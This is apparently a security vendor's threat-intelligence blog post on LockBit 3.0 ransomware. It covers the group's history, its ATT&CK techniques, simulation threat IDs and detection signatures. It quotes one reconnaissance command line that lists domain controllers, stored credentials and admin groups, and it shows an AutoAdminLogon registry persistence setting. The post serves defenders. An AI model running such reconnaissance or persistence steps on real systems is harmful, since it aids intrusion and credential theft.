CISA Alert AA23-075A: The Latest LockBit Ransomware Variant - LockBit 3.0
This blog was updated on June 15th, 2023 after the release of CISA Alert AA23-165A.
On March 16th, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on LockBit 3.0 ransomware from the notorious Ransomware-as-a-Service (RaaS) gang LockBit [1]. Since LockBit employs the RaaS model, their affiliates target organizations from a wide range of industries and countries.
Picus Threat Library already had attack simulations for LockBit 3.0 ransomware. In this blog, we explain tactics, techniques, and procedures used by the LockBit ransomware group and how you can assess your security posture against LockBit ransomware attacks.
Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform
LockBit Ransomware Group
LockBit ransomware group is one of the most prolific threat groups in the ransomware scene. They were first observed in September 2019 and have developed multiple ransomware variants since then.
LockBit group is a financially motivated ransomware group that employs trending ransomware business models such as Ransomware-as-a-Service (RaaS), double extortion, and Initial Access Brokers (IABs). The use of these business models leads to a significant increase in the number of affiliated threat actors. The threat actors do not have any particular pattern for their targets. The LockBit attacks are spread to nearly all industries as they are financially motivated, opportunistic attacks. It is estimated that LockBit is responsible for nearly 40% of all ransomware infections worldwide.
What Is LockBit 3.0 Ransomware?
LockBit ransomware developers first released their original ransomware sample in September 2019. Back then, it was named ABCD ransomware. In 2020, they launched their RaaS affiliate program and leak site with the adoption of RaaS and double extortion models. Since then, the ransomware gang has developed several ransomware variants and expanded their operations. Due to a large number of affiliated threat actors, LockBit tools and infrastructure were observed in major ransomware attacks against large organizations such as Accenture, Continental, Foxconn, and many others.
Date |
Event |
September 2019 |
Release of ABCD ransomware, the first ransomware variant developed by LockBit |
January 2020 |
Start of LockBit RaaS affiliate program |
September 2020 |
Creation of the LockBit leak site |
June 2021 |
Release of LockBit 2.0, also known as LockBit Red Release of StealBit data exfiltration tool |
October 2021 |
Release of LockBit Linux-ESXi Locker v1.0 |
March 2022 |
Release of LockBit 3.0, also known as LockBit Black |
September 2022 |
LockBit 3.0 builder leaked and several non-affiliated LockBit variants emerged. |
January 2023 |
Release of LockBit Green |
Table 1: Timeline of LockBit operations
LockBit 3.0, also known as LockBit Black, was first seen in June 2022, and it is more modular and evasive than its predecessors. This new variant can be configured with different options at the time of compilation and execution of the payload. In addition to this modular approach, the ransomware payload remains encrypted until execution which makes malware analysis and detection highly difficult.
Example 1: LockBit Black Ransomware Attacks by Countries [2]
Emergence of LockBit Green
After the release of LockBit Black, the LockBit group announced a bug bounty program to address the vulnerabilities found in the ransomware. While the bounty program was the first in the RaaS scene, it caused strife within the ransomware group, and some developers leaked the source code of LockBit 3.0 in September 2022. Several ransomware groups created their own ransomware variants using the leaked source code.
In January 2023, LockBit released its latest ransomware variant named LockBit Green. This new variant incorporates source code from the infamous Conti ransomware and shares significant similarities with Conti v3.
TTPs Used by LockBit 3.0
Tactic: Initial Access
T1078 Valid Accounts
LockBit ransomware threat actors utilize valid accounts to gain initial access to their targets' environment. These valid accounts are sometimes acquired from Initial Access Brokers (IABs). Valid accounts are also used for establishing persistence in the victims' networks.
T1133 External Remote Services
Adversaries exploit remote desktop services to gain access to their targets' network. In some attacks, attackers use brute force into VPN and RDP services.
T1189 Drive-by Compromise & T1566 Phishing
LockBit threat actors trick their victims into downloading and executing a malicious zip file that contains SocGholish malware. The malware then deploys a Cobalt Strike beacon for persistent access for attackers. SocGholish malware is also used for system and domain information discovery.
powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net group 'Enterprise Admins' /domain ; net localgroup Administrators /domain ; net localgroup Administrators ; |
Example 2: Commands executed by SocGholish malware [3]
T1190 Exploit Public Facing Applications
LockBit-affiliated threat actors exploit various vulnerabilities found in public-facing applications such as Microsoft Exchange servers, Fortigate SSL VPN, F5 BIG-IP, ESXi servers, and Microsoft IIS servers. Most of these exploited vulnerabilities are known, and related patches are available. Organizations are advised to patch their vulnerable services or apply workarounds as soon as possible.
Tactic: Execution
T1072 Software Deployment Tools
LockBit ransomware group uses an open-source package installer called Chocolatey to avoid detection when installing and executing malicious payloads.
Tactic: Persistence & Privilege Escalation
T1547 Boot or Logon Autostart Execution
Adversaries change the registry below to establish persistence and elevate privileges.
Registry Key |
Value |
Data |
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
AutoAdminLogon |
1 |
DefaultUserName |
<username> |
|
DefaultDomainName |
<domain_name> |
Tactic: Defense Evasion
T1027 Obfuscated Files or Information
To avoid detection, LockBit encrypts host and bot information before sending it to its command and control servers.
T1070.004 Indicator Removal: File Deletion
After successfully completing the attack, LockBit 3.0 ransomware deletes itself from the infected host to hinder malware analysis.
T1480.001 Execution Guardrails: Environmental Keying
In some cases, the LockBit group shares the ransomware payload in an encrypted format with its affiliates. Without the decryption key, the payload cannot be executed by attackers or analyzed by defenders. This technique is also used to avoid signature-based detection.
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
LockBit threat actors use ProDump, a Microsoft SysInternals tool, to dump the contents of LSASS memory. The extracted LSASS memory is then used to harvest credentials.
Tactic: Discovery
T1046 Network Service Discovery & T1082 System Information Discovery
LockBit ransomware threat actors use a publicly available network scanner named SoftPerfect Network Scanner. This tool collects information about hostnames, network services, and remote access protocols in their victims' networks.
T1614.001 System Location Discovery: System Language Discovery
LockBit ransomware checks the language settings of the infected host. If the detected language is in the exclusion list, the payload does not encrypt the victims' files. For example, LockBit 3.0 variant does not encrypt files if the language setting is "Arabic (Syria)", "Romanian (Moldova)", and "Tatar (Russia)".
Tactic: Lateral Movement
T1021.001 Remote Services: Remote Desktop Protocol
Adversaries use a remote desktop software called Splashtop to easily move between hosts in the victims' network.
Tactic: Command and Control
T1071.002 Application Layer Protocol: File Transfer Protocols
LockBit threat actors use a popular file transfer tool called FileZilla to transfer files between compromised hosts and attackers' C2 servers.
T1572 Protocol Tunnel
Adversaries use PuTTY Link (Plink) to automate SSH actions on the victims' hosts. This technique also helps adversaries avoid being detected.
Tactic: Exfiltration
T1567 Exfiltration Over Web Service
LockBit threat actors use popular file-sharing services such as MEGA to exfiltrate their victims' sensitive data using rclone, an open-source cloud storage manager.
Tactic: Impact
T1485 Data Destruction & T1490 Inhibit System Recovery
LockBit deletes log files, files in the recycle bin folder, and volume shadow copies after encrypting the victims' files. These actions significantly hinder the forensic and recovery efforts of security teams.
T1486 Data Impact for Encryption
LockBit ransomware uses a hybrid encryption approach with AES and RSA encryption algorithms.
How Picus Helps Simulate LockBit Ransomware Attacks?
We also strongly suggest simulating LockBit ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus The Complete Security Validation Platform. You can also test your defenses against hundreds of other ransomware, such as Zeppelin, Royal, and Maui, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for LockBit ransomware:
Threat ID |
Threat Name |
Attack Module |
74169 |
LockBit Green Ransomware Download Threat |
Network Infiltration |
43227 |
LockBit Green Ransomware Email Threat |
Email Infiltration (Phishing) |
76668 |
LockBit 3.0 Malware Downloader Download Threat |
Network Infiltration |
30789 |
LockBit 3.0 Malware Downloader Email Threat |
Email Infiltration (Phishing) |
24168 |
LockBit 3.0 Ransomware Download Threat |
Network Infiltration |
71275 |
LockBit 3.0 Ransomware Email Threat |
Email Infiltration (Phishing) |
42142 |
LockBit 2.0 Ransomware Email Threat |
Email Infiltration (Phishing) |
56526 |
LockBit 2.0 Ransomware Download Threat |
Network Infiltration |
59891 |
LockBit Ransomware Email Threat |
Email Infiltration (Phishing) |
55537 |
LockBit Ransomware Download Threat |
Network Infiltration |
Moreover, Picus Threat Library contains 300+ threats containing 3000+ web application and vulnerability exploitation attacks in addition to 1500+ endpoint, 8000+ malware, email and data exfiltration threats as of today.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address LockBit ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for LockBit ransomware:
Security Control |
Signature ID |
Signature Name |
Check Point NGFW |
85259031 |
Malicious Binary.TC.a9a1gtaF |
Check Point NGFW |
0DF8EAD47 |
Ransomware.Win32.LockBit.TC.4595IgpB |
Check Point NGFW |
0B9B5200F |
Ransomware.Win32.LockBit.TC.ad |
Check Point NGFW |
0A9203C66 |
Trojan-Ransom.Win32.Encoder.ndg.TC.468eHzih |
Check Point NGFW |
0E8314685 |
Trojan.Win32.Generic.Win32.Generic.TC.fac8lKAS |
Check Point NGFW |
0974D1461 |
Ransomware.Win32.LockBit.TC.ac72xYUR |
Check Point NGFW |
08A63F7F6 |
UDS:Trojan-Ransom.Win32.Generic.TC.ddcbnxCE |
Check Point NGFW |
0F78C125A |
Trojan.Win32.Generic.Win32.Generic.TC.53caLqjh |
Check Point NGFW |
0D3183045 |
Trojan-Ransom.Win32.Encoder.ndj.TC.9769PdQO |
Check Point NGFW |
0A62659F4 |
Trojan-Ransom.Win32.Encoder.ney.TC.2f27eHNJ |
Check Point NGFW |
088F2DF9C |
Trojan-Ransom.Win32.Encoder.nfh.TC.0f7dmjJv |
Check Point NGFW |
0E3B25556 |
Trojan.Win32.Ransomware.Win32.LockBit.TC.2e8dsGuZ |
Check Point NGFW |
0D83B7962 |
Trojan.Win32.Ransomware.Win32.LockBit.TC.fbefAOYh |
Check Point NGFW |
0B44AC79B |
Trojan.Win32.Ransomware.Win32.LockBit.TC.d0f1pgCM |
Check Point NGFW |
0B2A953A5 |
Trojan.Win32.Ransomware.Win32.LockBit.TC.23a4LuVq |
Check Point NGFW |
0B4088178 |
Trojan.Win32.Ransomware.Win32.LockBit.TC.1619pCUl |
Check Point NGFW |
0EE101D4F | Ransomware.Win32.LockBit Green.TC.55ddsbul |
Check Point NGFW |
0E9ACE64D | Ransomware.Win32.LockBit Green.TC.3813mKCF |
Cisco FirePower |
|
W32.Auto:baafd4.in03.Talos |
Cisco FirePower |
|
W32.80E8DEFA53-95.SBX.TG |
Cisco FirePower |
1.58024.1 |
MALWARE-OTHER Win.Ransomware.Lockbit download attempt |
Cisco FirePower |
1.54910.1 |
MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt |
Cisco FirePower |
1.54911.1 |
MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt |
Cisco FirePower |
|
Win.Ransomware.Lockbit::in03.talos |
Cisco FirePower |
|
Auto.FB49B9.261467.in02 |
Forcepoint NGFW |
|
File_Malware-Blocked |
Fortigate AV |
10113116 |
VBA/Agent.F230!tr |
Fortigate AV |
10079067 |
NSIS/Injector.AOW!tr |
Fortigate AV |
10123717 |
W32/Lockbit.K!tr.ransom |
Fortigate AV |
10042007 |
W32/Lockbit.C2F8!tr.ransom |
Fortigate AV |
10093469 |
W32/LockBit.2513!tr.ransom |
Fortigate AV |
8138651 |
W32/Filecoder.NXQ!tr.ransom |
Fortigate AV |
10089996 |
MSIL/GenKryptik.EBMY!tr.ransom |
Fortigate AV |
8183406 |
W32/LockBit.29EA!tr.ransom |
Fortigate AV |
10085361 | W64/GenKryptik.FSFZ!tr.ransom |
Fortigate AV |
8273597 | W32/Conti.F!tr.ransom |
Fortigate AV |
62183 | PossibleThreat |
McAfee |
0x40232600 |
HTTP: Microsoft Word DOCX Macro Vulnerability |
McAfee |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Palo Alto NGFW |
543891824 |
trojan/Win32.nemesis.hz |
Palo Alto NGFW |
514958735 |
Trojan-Ransom/Win32.encoder.xj |
Palo Alto NGFW |
419491650 |
trojan/Win32 EXE.encoder.ua |
Palo Alto NGFW |
527143790 |
trojan/Win32 EXE.malware.bdkw |
Palo Alto NGFW |
344149788 |
trojan/Win32 EXE.filecoder.adu |
Palo Alto NGFW |
334282092 |
Malware/Win32.msilinj.dsw |
Palo Alto NGFW |
333569703 |
Malware/Win32.msilinj.dsj |
Palo Alto NGFW |
343726995 |
Trojan-Ransom/Win32.wanna.xn |
Palo Alto NGFW |
332681025 |
ransomware/Win32 EXE.wanna.xj |
Palo Alto NGFW |
573007961 | TrojanDownloader/Win64.bazaarloader.b |
Palo Alto NGFW |
571147349 | Ransom/Win32.conti.cb |
Snort |
1.2019835.2 |
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project |
Snort |
1.58024.1 |
MALWARE-OTHER Win.Ransomware.Lockbit download attempt |
Snort |
1.54910.1 |
MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt |
Snort |
1.54911.1 |
MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus The Complete Security Validation Platform.
References
[1] "#StopRansomware: LockBit 3.0," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a. [Accessed: Mar. 17, 2023]
[2] "LockBit ransomware - what you need to know." [Online]. Available: https://www.tripwire.com/state-of-security/lockbit-ransomware-what-you-need-know. [Accessed: Mar. 17, 2023]
[3] "Back in Black: Unlocking a LockBit 3.0 Ransomware Attack," NCC Group Research, Aug. 19, 2022. [Online]. Available: https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/. [Accessed: Mar. 17, 2023]